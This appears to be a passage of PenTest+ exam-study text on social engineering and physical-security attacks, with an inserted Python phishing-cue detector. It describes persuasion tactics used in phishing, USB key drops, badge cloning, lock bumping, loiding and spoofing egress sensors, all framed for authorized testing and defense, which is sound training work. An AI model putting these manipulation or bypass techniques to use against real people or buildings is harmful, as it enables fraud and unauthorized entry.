SMS phishing: Phishing attacks conducted through text messaging instead of email

Voice phishing: Phishing attacks that use voice over the phone instead of email

Whaling: A phishing attack that targets the “big fish” of a company, such as the CEO

For the PenTest+ certification exam, remember the different forms of phishing attacks. Also remember that the rules of engagement should identify whether social engineering attacks are allowed in the penetration test.

Shoulder surfing

Shoulder surfing is a traditional type of attack in which the hacker watches over the shoulder of the user to see what the user is typing on the computer or mobile device in order to obtain information.

USB key drop

Another type of social engineering attack common in penetration testing is a USB key drop. With a USB key drop, the pentester leaves USB flash drives around the organization in the hope that an employee picks one up and plugs it into a computer to see what is on the drive. As a penetration tester, you configure a script or application to run automatically when the drive is connected and send you an email message that includes information such as the IP address of the system the drive is connected to.

With a USB key drop, you are able to find out the security awareness level of the organization. If you set out ten USB drives and you get eight email messages, it is obvious that the employees do not understand that they should not connect untrusted devices to their computers. Another benefit of using a USB key drop in your penetration test is that you can use it to collect information such as IP addresses of hosts on the network. You can then treat these IP addresses as potential targets.

Other forms of social engineering

In addition to the types of social engineering attacks discussed in the previous sections, social engineering attacks may also take the form of impersonation and interrogation. For example, a hacker (or pentester) could impersonate an administrator to try to trick the user into compromising security (for example, the hacker convinces the user to change his or her password). If social engineering attacks are in the scope of the assessment, you could try calling or emailing employees while impersonating the administrator to trick the employee into compromising security. You could also impersonate a user who contacts the administrator and see if the administrator can be tricked into helping you access the system.

Interrogation is another form of social engineering attack specifically called out in the objectives of the CompTIA PenTest+ certification exam. When interviewing or interrogating people, a number of physical reactions to questions can be used to identify topic areas that should lead to more questioning. For example, when people start to feel stress, they usually start to touch their face a lot; watch for these visual cues during interviews and interrogation.

The key point to remember about social engineering is that your goal is elicitation. You would like to elicit a response or reaction from employees that causes them to compromise security. You could also use a business email compromise (BEC) attack, where you gain access to an employee’s corporate email account and use it to send messages to other employees in the company.

Motivation techniques in social engineering attacks

What are some of the motivation techniques used in social engineering attacks that cause the attack to succeed? A common technique is to evoke a sense of urgency for the end user to click the link in an email message from the hacker. When social engineering attacks are sent out, the hacker usually stresses the urgency to act now as a way to get the user to click the link or run the application without thinking about it too much.

Following is a list of motivational techniques often used by the hacker or penetration tester to get a user to compromise security:

Authority: The hacker or penetration tester pretends to be a person of authority requesting that the user perform an action. This action, such as clicking a link in an email message or changing a password, is enough to help the hacker gain access to the system.

Scarcity: The communication from the hacker or pentester typically implies a shortage of time or the chance of a prize in order to trick the person into acting now.

Social proof: The hacker or pentester relies on the idea that if users see others doing something, they feel it is the correct thing to do, so they do it too. For example, if everyone is downloading a certain program, a user may feel that it must be safe if everyone else is doing it.

Urgency: The hacker or pentester evokes a sense that swift action is important in order to get users to act on the request.

Likeness: People respond well to people they like, and are, by nature, typically willing to help someone in need. If the attacker can appear to be in need and has a friendly demeanor, the victim may let his or her guard down and be more likely to respond to the social engineering attack.

Fear: The hacker or pentester uses fear to elicit a response from the user. For example, a hacker sends an email message telling the user that a security vulnerability was found in the system that gives someone full access to the system, and that to remove this vulnerability, the user must install a “patch.” In reality the patch is the malicious software that allows the attacker into the system.
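As an added example from the defender's side (not code from the article or the book), the Python below scores an email body for the six motivation techniques just listed and for the fake-bank-site pattern described under phishing, where the visible link text names one site but the real destination is another. The cue phrase lists and the sample message are constructed for illustration, and a real awareness tool would need far richer cues.

```python
"""Added example (not from the original article): flag the motivation
techniques listed above (authority, scarcity, social proof, urgency,
likeness, fear) in an e-mail body and detect links whose visible text
names a different site than the real destination, as an awareness aid."""
import re
from urllib.parse import urlparse

# Cue phrases per technique; these lists are constructed for illustration.
CUES = {
    "authority": ["it department", "ceo", "administrator", "security team"],
    "scarcity": ["limited time", "last chance", "prize", "only a few"],
    "social proof": ["everyone", "all staff", "your colleagues"],
    "urgency": ["immediately", "within 24 hours", "act now", "urgent"],
    "likeness": ["hope you can help", "friend", "thanks so much"],
    "fear": ["suspended", "vulnerability", "compromised", "locked"],
}
LINK_RE = re.compile(r'<a\s+href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
DOMAIN_RE = re.compile(r"^(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})", re.I)


def detect_techniques(body):
    """Return the set of techniques whose cue phrases appear in the body."""
    text = body.lower()
    return {name for name, phrases in CUES.items()
            if any(p in text for p in phrases)}


def mismatched_links(html):
    """Return (shown_text, real_host) for links whose visible text looks like
    a URL or domain but points somewhere else (the fake-bank-site pattern)."""
    found = []
    for href, shown in LINK_RE.findall(html):
        shown = re.sub(r"<[^>]+>", "", shown).strip()
        real_host = (urlparse(href).hostname or "").lower()
        m = DOMAIN_RE.match(shown)
        if m and m.group(1).lower() != real_host:
            found.append((shown, real_host))
    return found


def risk_score(html):
    """One point per technique found, two per deceptive link."""
    return len(detect_techniques(html)) + 2 * len(mismatched_links(html))


# Constructed sample message (not a real phishing e-mail).
SAMPLE_EMAIL = """<p>From the IT department: your account will be suspended
unless you verify it immediately. Everyone in your team has already done this.</p>
<p><a href="http://login-verify.example.net/x">https://bank.example.com/login</a></p>"""
```

Running `risk_score(SAMPLE_EMAIL)` flags authority, fear, urgency and social proof plus one deceptive link, which is the combination the article describes: an authoritative sender, a threat, a deadline, and a link that looks like the bank but is not.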

Attacks on Physical Security

Article / Updated 03-22-2021

Physical security plays an important role in any organization’s security program and defensive posture, and you need to know some basics about attacks on physical security to pass the CompTIA PenTest+ exam. Physical security involves controlling who has physical access to the facility, the servers, network equipment, and end-user devices.

Types of physical security controls

Organizations use a number of physical security controls to regulate who gains access to the facility or which areas of the facility they can access. Highly secured environments control access to the facility with high fencing around the perimeter of the property and only one or two entrances used to enter or leave. These entrances have gates and security guards that control who gains access to the building. In highly secured locations, the guard ensures that everyone who enters has an ID badge. Visitors typically need to get a guest badge and be escorted by the employee who is hosting them. Once inside the building, doors are locked to control who can gain access to different areas of the building. Companies can use traditional locks and keys, combination locks, or electronic locking systems where a card needs to be swiped in order to gain access to that area of the building.

Exploiting physical security

A number of methods may be used to bypass physical security controls. As a penetration tester, you may need to test these physical controls and see if you can bypass the security to gain access to areas of the building you should not have access to.

Piggybacking/tailgating

To compromise physical security as a penetration tester, you can try to follow an employee who does have access into a restricted area of the building after the employee unlocks the door. There are two terms for this type of physical security attack:

Piggybacking: Piggybacking occurs when employees use their swipe card (key) to unlock a door and allow the person behind them into the locked area as well, without making that person swipe his or her card. This exploits the human tendency to hold the door open for the next person. As the penetration tester, you want to test whether you can piggyback into the facility, as this identifies a huge security concern. Note that with piggybacking, the person is aware that he or she is allowing you in.

Tailgating: Tailgating is similar to piggybacking, with the exception that the employee has no idea you slipped through the door after he or she unlocked it.

For the PenTest+ certification exam, remember the difference between piggybacking and tailgating. Piggybacking involves the employee knowingly allowing someone to gain access to a restricted area, while with tailgating, the employee did not know someone gained access after the employee unlocked the door.

A great countermeasure to prevent piggybacking and tailgating is a mantrap. A mantrap is an area between two locked doors; the second door does not unlock until the first door locks. This ensures employees know who is with them at all times. Revolving doors are another type of mantrap that helps ensure no one else slips through while an employee is going through.

Dumpster diving

One method of discovering sensitive information about a company and its employees is dumpster diving. With dumpster diving, the attacker goes through the garbage of the intended victim trying to locate information that could help in an attack. It is important to shred all sensitive documents so that the sensitive information cannot be discovered via a dumpster diving attack.

Badge cloning

Electronic badges are often used to gain access to restricted areas within a building. If attackers can get their hands on a badge, they can use a badge cloning device to copy the electronic data stored on the badge, which can then be used to gain access to the building.

Fence jumping

Having a fence around the perimeter of the facility is only going to keep innocent people out. A determined hacker can easily climb the fence to gain access to the facility, so it is important that you design a fencing strategy that makes it difficult to climb. Most highly secured environments use a high fence that angles outward at 45 degrees at the top to make it difficult for someone to climb over. Companies will also have barbed wire at the top to prevent someone from trying to climb over the top.

Attacks on locks

Traditional locks are susceptible to lock picking in order to gain access to the locked area. A bump key is one example of a lock-picking technique, where a filed-down key is placed in the lock and then tapped (bumped) lightly while turning the key slightly. This causes all of the cylinders within the lock to jump up above the cylinder breaking point (hopefully), which then unlocks the door. Many high-quality locks today advertise that they are “bump proof.”

Lock bypass is another lock-picking technique in which different methods are used to bypass the locking system. One technique used to bypass a lock is loiding, in which a credit card is used to bypass a self-closing latch system. Car locks can be bypassed by inserting a stiff wire between the door and the car body in order to manipulate the locking system.

Another example of an attack on locks involves motion-sensor doors that remain locked until they detect that someone is trying to leave from the inside, at which time the door unlocks. These doors use egress sensors (to detect people going out) that are motion sensors. There is a known hack where attackers spray compressed air from outside through the cracks in the door to trigger the motion sensor and unlock the door.
